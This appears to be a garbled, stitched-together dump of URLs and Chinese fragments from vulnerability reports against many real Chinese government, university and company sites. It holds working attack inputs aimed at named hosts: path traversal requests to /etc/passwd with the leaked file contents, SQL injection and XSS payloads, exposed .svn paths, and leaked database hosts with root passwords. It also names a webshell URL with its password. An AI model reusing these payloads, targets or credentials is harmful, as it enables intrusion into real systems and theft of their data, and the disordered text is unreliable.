http://www.xsmlr.gov.cn/MainPage.aspx?_Ascx=/Data/Layout/Page/2/UserForgetPassword.ascx&_CM=0&_CT=600&_M0=5&_MenuID=33489&_Part=1&_PFD=0&_SID=WebSite http://www.xsmlr.gov.cn/MainPage.aspx?_Ascx=/Data/Layout/Page/2/UserForgetPassword.ascx&_CM=0&_CT=600&_M0=5&_MenuID=33489&_Part=1&_PFD=0&_SID=WebSite http://www.hsgt.gov.cn/MainPage.aspx?Mode=more&P_InfoPath=/%e5%85%ac%e5%85%b1%e4%bf%a1%e6%81%af%e5%ba%93/%e5%9b%bd%e5%9c%9f%e4%b8%9a%e5%8a%a1/%e5%9c%9f%e5%9c%b0%e4%be%9b%e5%ba%94/%e5%8d%8f%e8%ae%ae%e5%87%ba%e8%ae%a9%e6%84%8f%e5%90%91%e5%85%ac%e5%91%8a/&P_Title=%e6%8b%9b%e6%8b%8d%e6%8c%82%e7%bb%93%e6%9e%9c&_Ascx=/OA/PersonalWork/InfoBase/InfoPublish/InfoListPartPage.ascx&_CM=2&_CT=600&_MenuID=0&_Part=1&_PFD=2518&_SID=WebSite www.wxxqmlr.gov.cn/MainPage.aspx?_Ascx=/OA/PersonalWork/InfoBase/UserRegister/UserForgetPassword.ascx&_CM=0&_CT=600&_MenuID=0&_Part=1&_PFD=1549&_SID=WebSite www.wxxqmlr.gov.cn/MainPage.aspx?_Ascx=/OA/PersonalWork/InfoBase/UserRegister/UserForgetPassword.ascx&_CM=0&_CT=600&_MenuID=0&_Part=1&_PFD=1549&_SID=WebSite http://www.hsibi.gov.cn/MainPage.aspx?Mode=more&P_InfoPath=/%e5%85%ac%e5%85%b1%e4%bf%a1%e6%81%af%e5%ba%93/%e9%a6%96%e9%a1%b5/%e5%91%a8%e8%be%b9%e5%8a%a8%e6%80%81/&P_Title=%e4%bf%a1%e6%81%af%e5%88%97%e8%a1%a8&_Ascx=/OA/PersonalWork/InfoBase/InfoPublish/InfoListPartPage.ascx&_CM=0&_CT=600&_MenuID=0&_Part=1&_PFD=1613&_SID=WebSite http://ca.wxgtfj.cn/MainPage.aspx?WebPageID=88624&_SID=WebSite http://ca.wxgtfj.cn/MainPage.aspx?WebPageID=88624&_SID=WebSite http://yangshan.huishan.gov.cn/MainPage.aspx?WebPageID=580&_M0=2&_M1=2&_MenuID=33571&_SID=WebSite http://yangshan.huishan.gov.cn/MainPage.aspx?WebPageID=580&_M0=2&_M1=2&_MenuID=33571&_SID=WebSite http://bt.wxgtfj.cn/MainPage.aspx?Mode=more&_Ascx=/OA/Test/PersonTest/VoteHisSearch.ascx&_CM=0&_CT=600&_MenuID=0&_Part=1&_PFD=186964&_SID=WebSite http://bt.wxgtfj.cn/MainPage.aspx?Mode=more&_Ascx=/OA/Test/PersonTest/VoteHisSearch.ascx&_CM=0&_CT=600&_MenuID=0&_Part=1&_PFD=186964&_SID=WebSite http://nc.wxgtfj.cn/MainPage.aspx?Mode=more&_Ascx=/OA/Test/PersonTest/VoteHisSearch.ascx&_CM=0&_CT=600&_MenuID=0&_Part=1&_PFD=186595&_SID=WebSite http://nc.wxgtfj.cn/MainPage.aspx?Mode=more&_Ascx=/OA/Test/PersonTest/VoteHisSearch.ascx&_CM=0&_CT=600&_MenuID=0&_Part=1&_PFD=186595&_SID=WebSite http://dfi.bnuz.edu.cn/teacher.php?teacherid=42&pageid=2 ftp://115.28.45.48。里面有一个文档ftp://115.28.45.48/pub/11.txt http://mail.tass.com.cn/ http://nihao.net/ http://mail.iapppay.com/webmail/login9.php http://support.chanjet.com:9090/ http://office.focus.cn/office/kfs_info.php?kfs_id=1072 http://116.213.70.99/ http://brand.kimiss.com/all.html?keyword=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Submit2=%CB%D1%CB%F7 http://124.65.49.12/filsys/security/login.action http://v5.pc.duomi.com/share-share_api-profile?uid=3942052 www.100.com http://i.100.com/profile https://b2b.ccb.cn:1025/NCCB/B2BFileIBSContentServlet?fileName=../../../../../../../../../../../../../../../../etc/passwd&branchId=999999001&language=CN&ibsReqType=2 http://203.208.46.145/#filter=0&newwindow=1&q=%E8%BD%AF%E4%BB%B6%E9%80%9A-%E4%B8%AD%E6%96%B0%E9%87%91%E6%A1%A5+inurl:softwarer&start=40 http://210.41.233.137/softwarer/bbs/upload.asp http://www.zzyb.org/fckeditor/editor/filemanager/browser/default/browser.html?Type=&Connector=connectors/jsp/connector http://123.126.32.82:8080/script http://202.103.49.226/ http://www.hfjs.gov.cn/searchCenter/compBaseInfo.jsp?item_id=0701&comp_id=A08009101417613178 http://v.baidu.com/v?word=xxx&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800 http://v.baidu.com/v?word=xxx&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800#pn=0&old=&ty=0&nf=0&cl=0&du=1&pd=0&sc=0&order=0 http://q.letv.com/ http://uu.chanjet.com/http://uu.chanjet.com/login.aspx http://go.sohu.com/2013/innovator/geren.php?userid=16852 http://svn.go.sohu.com/pmis/factory/sandbox//2013/innovator/geren.php?userid=16852 http://125.69.85.194/login.php,邮件系统,用户名是不能输入一些特殊字符的,但是我们可以抓包在包里面进行修改,构造,比如,用户名用admin’去测试。 www.bjbus.com:80 www.bjbus.com http://www.sdutcm.edu.cn:80/news/news/manage http://www.bjsgsl.gov.cn/newshow.php?id=372 http://www.xgfgw.gov.cn/shownews.php?id=187 http://www.luolong.gov.cn/xiangzhen.php?id=999 http://www.hequ.gov.cn/hequ/templet/display.php?id=80 http://wap.17wo.cn/ http://wap.17.wo.com.cn/ http://wap.17.wo.com.cn/ForgetPassword!setPwd.action http://wap.17.wo.com.cn/Login!process.action http://wap.17wo.cn/ForgetPassword.action http://www.ahszkj.gov.cn/content/view.php?id=202如图: talks.jyb.cn/admin/.svn/entries http://cloud.dlink.com.cn/solutionsInfo.aspx?type=Cloud%20Camera&id=74 http://www.jia.com/citylist/search.php?callback=?&search_name=1 http://www.wooyun.org/bugs/wooyun-2014-060957 http://202.100.98.122/note/note_ucon.jsp jdbc:postgresql://127.0.0.1:5432/yinchuan http://www.chinauto.gov.cn/article_dtl.php?id=5411 http://www.qhsw.gov.cn/thread_2.php?id=1 http://rczx.seu.edu.cn/ddrc/show.asp?id=85 http://rczx.seu.edu.cn/qzdl/grjs.asp?gr=qizhao.ao inurl:student_info1.aspx http://202.203.225.17:8080/gmis/cjgl/apyjhlrcj.aspx inurl:student_info1.aspx http://ncrl.seu.edu.cn/NewsInfo.asp?ID=148 http://www.view.sdu.edu.cn/phpMyAdmin/ http://www.cjlu.edu.cn/cjlunew/NewsDetail.php?I=10436 http://filedown.bgpc.gov.cn:83/KCYG_POPEDOM/afterLogin/findNoReadBulletin.action http://hy.bgpc.gov.cn:82/MEETING_2009/userlogin/toUrl.action http://school.xjszxy.cn/ http://wlmqschool.xjszxy.cn/# http://wlmqschool.xjszxy.cn/# http://jy.seu.edu.cn/detach.portal?.f=pe2308&.pmn=view&action=bulletinsMoreView&.ia=false&.pen=pe2308&groupid= http://magazine.tcl.com/en/manager/login.aspx?ReturnUrl=%2fen%2fmanager%2fDefault.aspx http://pgzx.zafu.edu.cn/a.aspx http://tmjy.zafu.edu.cn/admin/admin.asp http://lxy.zafu.edu.cn/ http://pgzx.zafu.edu.cn/eWebEditorExt/admin/login.aspx ttp://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.** http://61.136.204.41:8080/edu/login!checkLogin.action http://www.tudou.com/programs/view/gh7jvNA-1JM/ http://yuanxian.letv.com/letv/net/checkLogin.jsp?callback=xxx http://zs.njupt.edu.cn/phpMyAdmin/index.php http://zs.njupt.edu.cn/html/Index/article/id/239。 http://zs.njupt.edu.cn/wel/Public/login www.esinidc.com http://xsc.njupt.edu.cn/ http://www.tl-hh.cn/note/note_login.jsp http://tl-wangtong.cn/note/note_login.jsp http://202.100.98.122/note/note_login.jsp http://58.18.184.26/note/note_login.jsp http://www.tl-hh.cn/note/note_login.jsp http://www.tl-hh.cn/note/note_leaword.jsp http://www.tl-hh.cn/note/note_browse.jsp http://www.tl-hh.cn/note/note_leaword.jsp http://210.14.147.254/page/user/admin/profile http://dir.minigame.qq.com/cgi-bin/yxs/GetYxsRegTime?callback=callback&dstuin= http://wooyun.org/bugs/wooyun-2014-060957 http://tl-wangtong.cn/cardload.jsp?filename=../../../../../../../../../../etc/passwd&maininfo_id=855 http://web18818.5udns.cn//cardload.jsp?filename=../../../../../../../../../../etc/passwd&maininfo_id=855 http://www.tl-dianxin.cn/cardload.jsp?filename=../../../../../../../../../../etc/passwd&maininfo_id=855 http://www.tl-hh.cn/cardload.jsp?filename=../../../../../../../../../../etc/passwd&maininfo_id=855 http://58.18.184.26/cardload.jsp?filename=../../../../../../../../../../etc/passwd&maininfo_id=855 http://www.tl-lanzhou.cn/cardload.jsp?filename=../../../../../../../../../../etc/passwd&maininfo_id=855 http://202.100.98.122/cardload.jsp?filename=../../../../../../../../../../etc/passwd&maininfo_id=855 http://1.180.181.126/cardload.jsp?filename=../../../../../../../../../../etc/passwd&maininfo_id=855 http://202.100.85.25/cardload.jsp?filename=../../../../../../../../../../etc/passwd&maininfo_id=855 http://tl-wangtong.cn/cardload.jsp?filename=../../../../../../../../../../etc/passwd&maininfo_id=855 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh http://182.131.21.138/swordcms/publish/default/static/main/index.htm http://zone.wooyun.org/index.php?do=publish&act=comment&fun=ajax&id=XX http://zone.wooyun.org/index.php?do=publish&act=comment&fun=ajax&id=XX http://www.smpx.com.cn/sz/article/ArticleShow.asp?ArticleID=2445 http://rdm.iflytek.com:2000 http://rdm.iflytek.com:6888/admin http://www.fxtiyu.com/do.php?inajax=1&do=spec&ac=article_count¶meter=1 http://corporateandinvestment.standardbank.co.za/forexWebsite/bak.jsp http://3g.club.xywy.com,没做任何验证,修改cookie中id值刷新就登入了(还是拿健康之家管理员帐号做测试吧) http://www.cjlu.edu.cn/cjlunew/NewsList.php?S= http://www.cjlu.edu.cn/cjlunew/NewsDetail.php?I= http://www.cjlu.edu.cn/cjlunew/Search.php?K= http://www.cjlu.edu.cn/cjlunew/Search.php?K=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E task.csdn.net/m/task/home?task_id=143 http://event.dota2.com.cn/dota2/seattle/order?pageNo=1&pageSize=10 http://event.dota2.com.cn/dota2/seattle/pagination?pageNo=1&pageSize=10 http://61.178.220.149:8099/ewebeditor/admin/ http://61.178.220.149:8099//ewebeditor/uploadfile/20140611010924268.jsp http://www.czj.uestc.edu.cn存在漏洞 http://202.115.18.3/ncre/Login!input.action http://dhadb.dha.ac.cn/getJjyz!getGuide_jjyzpz.action http://mwa.sinomed.ac.cn/display!findPeriodicalById.action http://lib.ciomp.ac.cn/webs/modlenews_resu.action http://www.yunyin.com/ics/case/client.cfm http://www.sdxjpc.com/CFIDE/administrator/logging/settings.cfm?locale=../../../../custommenu.xml%00en http://www.rymusic.com.cn/CFIDE/administrator/logging/settings.cfm?locale=../../../../custommenu.xml%00en www.yljy.com http://java.oracle.com/ http://aapi.sd.wanmei.com/ http://aapi.sd.wanmei.com/index.php/api/goods/getList?limit=10&offset=0&usage= http://aapi.sd.wanmei.com/index.php/api/goods/getTransactionList?goods_id=&limit=10&offset=0 http://detail.1688.com/offer/36781372993.html http://hxey.motherchildren.com:11111/ http://www.teatreexy.com/learningCenter/Default.aspx http://www.teatreexy.com/exchange/discussdetails.aspx?DID=100 http://www.chinaacc.com/tougao/2014_5/22_069518264112213412.shtml http://211.137.243.2:10001/partner/ lihonglei:123456(权限较大,为省级审批权限,其他账号没怎么试) http://211.139.80.193/ http://218.200.48.73:9090/partner/ http://www.teatree.cn/ http://www.tuniu.com/tours/2322017 http://www.im286.com/forum.php?id=1 htpp://192.168.1.100/test2.asp?id=1%20un%ion%20se%l%e%ct%201,2,3,4,5,pass%20from%20manage http://www.im286.com/1.asp?id=1%20un%ion%20se%l%e%ct%201,2,3,4,5,pass%20from%20manage http://119.147.224.60 http://119.147.224.60/include http://www.jnlbb.cn/article_article.php?aid=149 http://220.181.184.125 http://220.181.184.125/modules/ http://www.etaoshi.com/member/DelAddressRecord/ http://218.176.242.13/#filter=0&newwindow=1&q=%E8%BD%AF%E4%BB%B6%E9%80%9A-%E4%B8%AD%E6%96%B0%E9%87%91%E6%A1%A5+inurl:softwarer&start=40 http://ideaclub.lenovo.com.cn/club/index.php?m=store&c=index&f=chkCity http://www.cert.org.cn/22.asp?id=1 htpp://192.168.1.100/test2.asp?id=1%20un%ion%20se%l%e%ct%201,2,3,4,5,pass%20from%20manage http://www.cert.org.cn/22.asp?id=1%20un%ion%20se%l%e%ct%201,2,3,4,5,pass%20from http://engtc.sjtu.edu.cn:81/teacher/index.aspx http://www.dlink.com.cn/admin/ http://site/homeLogin.action?redirect:http://www.sina.com/ http://www.shengjinsuo.com/Safety/ResetPwd.aspx?id=参数1&flag=参数2 http://yuedu.sogou.com http://yuedu.sogou.com/ajax/user/buy/?bkey=8EFEF77F4EB2AC17BA4028A98BC0D0F6 inurl:login http://ayyc.ttpod.com http://yjsy.xmu.edu.cn/hy/SystemLogin/SystemLogin.asp?ty=glry&no=1 www.xxxx.com/adm/ http://v.wanmei.com/ http://qiantu.xdf.cn/blog/BlogAdmin/Include/caseCommentList.jsp?ArticleID=1 http://qiantu.xdf.cn/blog/BlogAdmin/Include/caseCommentList.jsp?ArticleID=1 bdbrowser://tabpage/,【手动编辑】时,【最常访问】哪儿会出现访问的top8。结果网页的title没有编码直接写入导致xss。 http://db.health.hsw.cn/uc/AddUCConsumerAction.action http://db.health.hsw.cn/hospital/1609.shtml http://119.147.224.* http://119.147.224.168是个测试论坛 http://119.254.30.40/index.action https://wechat.yinxiang.com/en/authCallback.action https://tools.yinxiang.com/wb/auth.action http://www.changedu.com/ inurl:portal/department http://pan.baidu.com/share/link?shareid=3106765115&uk=1463633463 http://boss.tootoo.cn/ http://member.99114.com http://chanpay.chanjet.com/news_more.asp?id=10’ http://support.chanjet.com/Registration/adduser/adduser.rar http://hn.zhidao.189.cn/ http://www.teatree.cn/register_loading.aspx?RadomId=1 http://crm.99114.com/common/jsp/file.jsp看到这个页面能上传然后就试试看了,上传了个小马,结果找不到呀,随手试试,结果...下列目录呀...果断找到了小马...然后balabla...看到了CDEZ盘 http://crm.99114.com/business/ http://crm.99114.com/userfile/attach/ http://crm.99114.com/admin/ http://crm.99114.com/common/ http://checkin.99114.com/ http://weixin.homeinns.com/football/card.php?id=1402151210 http://weixin.homeinns.com/card/step2.php?id=1402576722 http://58.213.129.225/index.jsp http://58.213.129.225/news.jsp?guideid=4 http://pinge.focus.cn/u/set/ http://xm.jckjj.gov.cn:8080/jcshenbao/login.jspa http://che.zju.edu.cn/ http://che.zju.edu.cn/tpe973/admin/login.php http://matrix.mojichina.com http://matrix.mojichina.com/accounts#manage https://192.168.222.128/global_admin.ini http://www.hjzlg.com/web3%5Cycms_pic.asp?class=1&page=2 http://www.hjzlg.com/web3%5Cycms_pic.asp?class=1%20or%20%28select%20count%28*%29%20from%20msysaccessobjects%29&page=2 http://www.sxtc.com.cn/content.php?id=1009%20and%201=1%20&node=113 http://www.sxtc.com.cn/content.php?id=1009%20and%201=2%20&node=113 inurl:xmlpzs/nowdetail.asp inurl:xmlpzs/jgdetail.asp inurl:xmlpzs/bsdetail.asp inurl:xmlpzs/fwsyqdetail.asp http://www.tazzfdc.com/bit-xxzs/xmlpzs/nowdetail.asp?id=200809250108 http://www.lzfg.com.cn/bit-xxzs/xmlpzs/nowdetail.asp?id=206806 http://www.whxfdc.com/bit-xxzs/xmlpzs/nowdetail.asp?id=10631 http://www.zmdfcxx.com/bit-xxzs/xmlpzs/nowdetail.asp?id=42067 http://www.ynfgj.gov.cn/bit-xxzs/xmlpzs/nowdetail.asp?id=4446 http://www.dyfc.gov.cn/bit-xxzs/xmlpzs/nowdetail.asp?id=401103 http://sys.syfdc.gov.cn/tt/bit-xxzs/gs/xmlpzs/nowdetail.asp?id=770723 http://218.84.62.161:8081/bit-xxzs/xmlpzs/nowdetail.asp?id=356559 http://www.xjksfcw.com/bit-xxzs/xmlpzs/nowdetail.asp?id=200906090066 http://beian.xtfdc.gov.cn/bit-xxzs/xmlpzs/nowdetail.asp?id=253989 http://www.dzxfdc.com/bit-xxzs/xmlpzs/nowdetail.asp?id=10459 http://www.xyfg.gov.cn/bit-xxzs/xmlpzs/nowdetail.asp?id=201101300004 http://gs.wf777.com/bit-xxzs/xmlpzs/nowdetail.asp?id=200909280804 http://www.lwfccs.com/bit-xxzs/xmlpzs/nowdetail.asp?id=200809250108 http://222.89.166.137/bit-xxzs/xmlpzs/nowdetail.asp?id=200809250108 http://61.185.69.154/bit-xxzs/xmlpzs/jgdetail.asp?objid=16&stype=kfgl http://www.bjsfdc.com.cn/bit-xxzs/xmlpzs/jgdetail.asp?objid=16&stype=kfgl http://219.154.46.179:8080/bit-xxzs/xmlpzs/bsdetail.asp?id=201406090106 http://www.cjfcw.com/bit-xxzs/xmlpzs/bsdetail.asp?id=526399 http://218.59.136.19/bit-xxzs/xmlpz/bsdetail.asp?id=201209130361 http://60.31.254.197/bit-xxzs/xmlpzs/bsdetail.asp?id=960100 http://www.ynfgj.gov.cn/bit-xxzs/xmlpzs/bsdetail.asp?id=607 http://www.szshouse.com/bit-xxzs/xmlpzs/fwsyqdetail.asp?id=201405220187 http://www.teatree.cn/register_success.aspx?LoginName=1 http://a.chanjet.com/fckeditor/editor/filemanager/connectors/test.html http://a.chanjet.com/fckeditor/editor/filemanager/connectors/uploadtest.html http://119.253.53.23/ http://www.spider.com.cn/forgetPasswordStepModify.html http://www.yingrongda.com/yrd/index!index.action http://tltblogxss.blog.sohu.com/ http://www.dameng.com/admin/Login.aspx host:121.14.161.118 port:8405 user:root pwd:root123 MYSQL_HOST:121.14.161.221 host:121.14.161.221 port:3306 user:uae_dev pwd:AYA5tVne http://mi.gxu.edu.cn/content.php?id=1356 http://www.changedu.com/ http://desktop.nju.edu.cn/cx/ http://dxscx.forestpolice.net/ http://180.209.64.18/cxcy/Index.aspx http://210.26.14.200/ http://sjjx.njit.edu.cn/cx/ http://nausrt.njau.edu.cn/ http://202.195.237.148/dcxm/Index.aspx http://sy.cxxy.seu.edu.cn/cx/ http://cx.njxzc.edu.cn/ http://210.38.64.108/cx/ http://cx.yctc.edu.cn/ http://cxsb.yzu.edu.cn/ http://cxcy.shisu.edu.cn/ http://cxcy.lzu.edu.cn/Index.aspx http://210.46.116.20/ http://jw1.jiangnan.edu.cn/dxscx/ http://202.119.81.120/ http://bylw.pk.njau.edu.cn/gxycx/ http://zheye.cc/index.php/Home/Index/edit_address_ajax?name=test123&url=http%3A%2F%2Fs.click.taobao.com&aid=259045 http://zheye.cc/3626 http://zheye.cc/3629 http://zheye.cc/3629中产生了变化。 http://submit.duote.com/1.txt http://guest.jiajiang.gov.cn/index.do URL:http://203.95.110.84/ http://203.95.110.84/1.asp;.txt http://labs.chinamobile.com/imic/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fvar%252Fwww%252Fmobilehub%252Fwww%252Fincludes%252Fsettings.php%2500.jpg http://labs.chinamobile.com/zhanhui/show/qiye/id/ http://mail.zisu.edu.cn/zisu.edu.cn.txt http://bbs.tiantian.com/.svn/entries https://login.homeinns.com http://www.homeinns.com/Test http://219.242.65.10/Recommend.aspx?action=UpdateClick&GUID=cc2fc0c0-13e3-4e6b-b1ff-ffa67bf30c97 http://219.242.65.10/fsweb/MakeIntert.aspx?ID=123 http://219.242.65.10/SubjectSearch.aspx?cn=64 http://219.242.65.10/fsweb/ViewOpern.aspx?ID=737124 http://wooyun.org/bugs/wooyun-2013-024770 http://wooyun.org/bugs/wooyun-2010-064342 http://ie.sogou.com/user/head.html?size=../../../../../../../../../etc/passwd%00.jpg inurl:/queryIn.jsp http://www.bcrj.com.cn/ http://202.118.8.2:8080/board/login.jsp?kind=login http://202.118.8.2:8080/opac_two/board/login.jsp?kind=login http://lib.cuc.edu.cn/opac_two/board/login.jsp?kind=login http://218.195.18.6:8082/board/login.jsp?kind=login http://202.197.224.89:8088/opac_two/board/login.jsp?kind=login http://202.118.8.2:8080 URL:http://www.linuxdiyf.com/viewthread.php?tid=276020&extra=page%253D&page=1 http://sp.hnppb.gov.cn/ http://wandou.im/a1gz7 http://www.72xuan.com/goods/?color=11 http://www.ceshizhandian.edu.cn/_web/ids/userRegister.do?_p=YXM9MSZwPTEmbT1OJg__ http://www.ceshizhandian.edu.cn//_web/ids/initPasswordRecoveryApply.do?_p=YXM9MSZ0PTAmcD0xJm09TiY_&t=0.3189659991047933 http://www.ceshizhandian.edu.cn/_web/ids/passwordRecoveryApplyResetPassword.do?_p=YXM9MSZ0PTAmcD0xJm09TiY_&key=27b09e73-8b7d-4575-aed5-aad9fb28478a http://www.ceshizhandian.edu.cn/_web/ids/resetNewPasswordRecoveryApply.do?loginName=test1&key=27b09e73-8b7d-4575-aed5-aad9fb28478a&_p=YXM9MSZ0PTAmcD0xJm09TiY_ http://www.ceshizhandian.edu.cn/_web/ids/passwordRecoveryApplyResetPassword.do?_p=YXM9MSZ0PTAmcD0xJm09TiY_&key=27b09e73-8b7d-4575-aed5-aad9fb28478a http://www.78oa.com/download/download42.html http://v4.78oa.com http://nx.bnet.cn http://nx.bnet.cn/sql/.svn/entries http://nx.bnet.cn/download/.svn/entries http://nx.bnet.cn/css/.svn/entries http://nx.bnet.cn/FCKeditor/.svn/entries http://nx.bnet.cn/image/.svn/entries http://nx.bnet.cn/images/.svn/entries http://nx.bnet.cn/js/.svn/entries http://nx.bnet.cn/lhzx/.svn/entries http://nx.bnet.cn/META-INF/.svn/entries http://nx.bnet.cn/public/.svn/entries http://nx.bnet.cn/version/.svn/entries jdbc:oracle:thin:@10.10.0.5:1521:zjhcsyst jdbc:oracle:thin:@172.31.21.138:1521:happy jdbc:oracle:thin:@10.80.10.226:1521:zjhc jdbc:oracle:thin:@10.80.10.180:1521:zjhc jdbc:oracle:thin:@10.80.10.226:1521:zjhc jdbc:oracle:thin:@10.80.10.180:1521:zjhc jdbc:oracle:thin:@10.10.0.5:1521:zjhcsyst jdbc:oracle:thin:@10.80.10.22:1521:bizpower jdbc:oracle:thin:@172.31.21.138:1521:happy http://cqtbf.njut.edu.cn/m/Newshowpage.aspx?id=18 http://cqtbf.njut.edu.cn/m/Newshowpage.aspx?id=18'%20and%201=2%20union%20all%20select%201,2,3,4,'5',6,7,8,9-- http://http://share.ucweb.local/discuz/ http://hg.ucweb.local/packer http://portal.ucweb.local/portal/proxy?action=performance%3Akpi%3Aget_kpi_item&_dc=1402633576074&cycle_id=23&kpi_item_id=50229&cur_action_base_status=1 url:http://***.uc.cn:8040/portal_***/ https://******.test1.9game.cn/ port:3306 user:ucgc_management port:3306 user:optest password:optest port:3355 password:ucw******yf host:121.14.161.118 port:8405 user:root password:root123 host:121.14.161.221 port:3306 user:uae_dev password:AY*****ne host:119.147.224.171 port:3306 user:nemo password:nemo http://www.wooyun.org php:47),关键看其中怎么过滤后缀的: http://ffp.xiamenair.com/About/Regist.aspx http://ffp.xiamenair.com/About/Regist.aspx http://www.sdlgcj.net/sdlgcj/news.jsp?id=6103 http://cssotest.kingdee.com/knowledge/search/searchKnowledge!knowledgeSearch.action?produceId=1003&ids=1140&id=1140&secondId=&versionId=0&currPage=2 http://u.izptec.com/login.php http://u.izptec.com/register.php http://u.izptec.com//manage_user.php?action=edituser&managerid=hacktest&type=hacktest http://u.izptec.com//manage_user.php?action=edituser&managerid=admin&type=admin http://www.ltxyt.com/xyt/dx/news/newsinfo.aspx?id=2178 inurl:info_Print.asp?ArticleID= http://www.hlbrc.cn/ http://www.cstqxx.com/ http://economy.njau.edu.cn:8011/ http://www.fushanedu.cn/ http://www.jn15zhong.cn/ http://www.rcsjyw.cn/ shell:http://edoas.scedu.net:8080/oa/css3.jsp pass:chopper inurl:menuInfo.do?nodeid= http://www.dgjsjd.net:8080/dgjdwz/menuInfo.do?nodeid=04&newsType=gcjd http://jdz.gzcc.gov.cn:8000/gzsznew/menuInfo.do?nodeid=02&newsType=gyzjz http://www.hkjsjd.cn/menuInfo.do?nodeid=08&newsType=jcjg http://www.sjzzjz.com:8000/news/menuInfo.do?getChild=yes&nodeid=0401 http://www.hngczl.com.cn:8080/news/menuInfo.do?nodeid=0808 https://github.com/search?q=noreply%40wandoujia.com&type=Code&ref=searchresults http://www.tyfda.gov.cn/web/tytwo/type.asp?rightid=48&sup_rightid=47&webmoreid=1361 http://fulian.wst.cn/qa/ShowQuestion.asp?id=15 http://192.168.100.235:1234/index.php http://www.lottery.org.cn/)存在注入漏洞,有漏洞的网址是http://lottery.org.cn/,可通过注入获得网站账号密码, http://222.184.252.156/jslyqtgz/manage/ns_toshouye.do?webid=gz http://222.184.252.156/jslyqtgz/toole/index.jsp http://222.184.252.156/jslyqtgz/fontse/index.html http://222.184.252.156/jslyqtgz/web.jsp http://222.184.252.156/jslyqtgz/date.jsp http://222.184.252.156/jslyqtgz/guige.jsp http://222.184.252.156:8080/workfield/employee_login.do http://www.hbrsks.cn:85/ http://house.wst.cn/NewHouse/ShowJiage.asp?HouseID=951 http://www.akgqt.com/xsh/admin/Admin_login.asp https://github.com/alphachoi/lab/blob/80ea76b87a9929d34ca9250e28f0fa30ccf00dd2/sendmail/sendmail.py http://117.135.151.44/server-status http://117.135.151.41/status http://117.135.151.245:80/status http://8.37.228.171/info http://atp****.unionpay.com/admin/auth/login http://t3serv002.mit.edu:50070/ http://60.28.205.41:8280/KuwoEdit/upPic/upPic.jsp http://img1.kwcdn.kuwo.cn/star/upload/5/5/1402715234581_.html http://vip.cn99.com/ http://180.110.91.28:80 https://online.unionpay.com/static.zip http://online.unionpay.com/static.zip http://tnet1.theti.org/evaluate/index.do http://online.ncu.edu.cn/eol/homepage/common/ http://pt.csust.edu.cn/eol/homepage/common/ http://eol.kmust.edu.cn/eol/homepage/common/ http://jxpt.cuit.edu.cn/eol/homepage/common/ http://met2.fzu.edu.cn/eol/homepage/common/ http://eol.cqu.edu.cn/eol/homepage/common/ http://eol.shzu.edu.cn/eol/homepage/common http://jx.gznu.edu.cn/eol/homepage/common/ http://eol.mju.edu.cn/eol/homepage/common/ http://e-learning.hznu.edu.cn/eol/homepage/common http://pt.csust.edu.cn/eol/homepage/common/ http://pt.csust.edu.cn/eol/popups/viewstudent_info.jsp?SID=99086&from=welcomepage http://**.unionpay.com/admin/auth/login http://www.wshang.com/about/txws.html http://i.wshang.com/Login/Default/Register.html http://xss.re/4914 http://xss.re/4914 http://count.wxjy.com.cn/count//counter.asp?user=90years http://www13.f5.bjjs.gov.cn/dig/search.action http://www13.f5.bjjs.gov.cn/dig/search.action?redirect:%25{3*4 http://www.zhaokao.net/kaowu.jsp?oid=19060 http://usports.tongji.edu.cn/plus usports.tongji.edu.cn/tj http://usports.tongji.edu.cn/plus/style.php http://usports.tongji.edu.cn/phpcms/index.php club.1hai.cn/cluborderdetail.aspx?confno=8000003848 http://news.xauat.edu.cn/read.php?classid=40&newsid=8083 http://peixun.eol.cn/interface/js/class_list_hubei.php?provinceid=42&sortid=3_62&callback= http://kechenggezi.com/users/infos.json?ids[]=user_id即可获取用户资料 http://ghc81.ghc.andrew.cmu.edu:50070/ http://220.181.167.34/_online/cacti/graph_view.php http://220.181.167.34/_logcrawler/ http://220.181.167.34/url/home/ site:js.189.cn http://club.xywy.com/static/20130128/18171956.htm http://kbs.cnki.net/forums/forums/ d9c2:8bae f5fe:3638 f5fe:3638 http://dasai.zzstep.com/dasai/aiyuzhihui/show.php?id=4389 http://t.hujiang.com/ http://bulo.hujiang.com/app/music/ http://www.ccgp-qinghai.gov.cn/new.jsp?id=392 ftp://yollyah.com http://218.29.79.80/senior/policy/?type=02” http://60.12.108.50:8080/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://m.998.com/ http://m.998.com/Api/Account/SendMobileCheckMsg.ashx http://m.998.com/phone_order.html,验证码同样是这样的神逻辑。这样做是为了让前端做短信验证码的验证。前端的验证还是很容易干掉的,短信验证码完全没用了。 http://m.998.com/Api/User/GetOrderList.ashx?cardNo=0&phone=18000000000&orderListType=1&page=1&pageSize=10 http://m.998.com/Api/User/GetOrderList.ashx?cardNo=100001450000&phone=&orderListType=2&page=1&pageSize=10 http://www.filteco.com/news_s.asp?id=11%27 http://www.dctennis.cn/news_c.php?id=210%27 http://www.laoxiangren.cn/news_c.php?id=48&cf=news%27 http://www.vazbrand.com/product_detail.asp?id=1222%27 http://www.fsfhad.com/news_c.php?id=326%27 inurl:Course_Default.aspx http://www.forestry.gov.cn/ 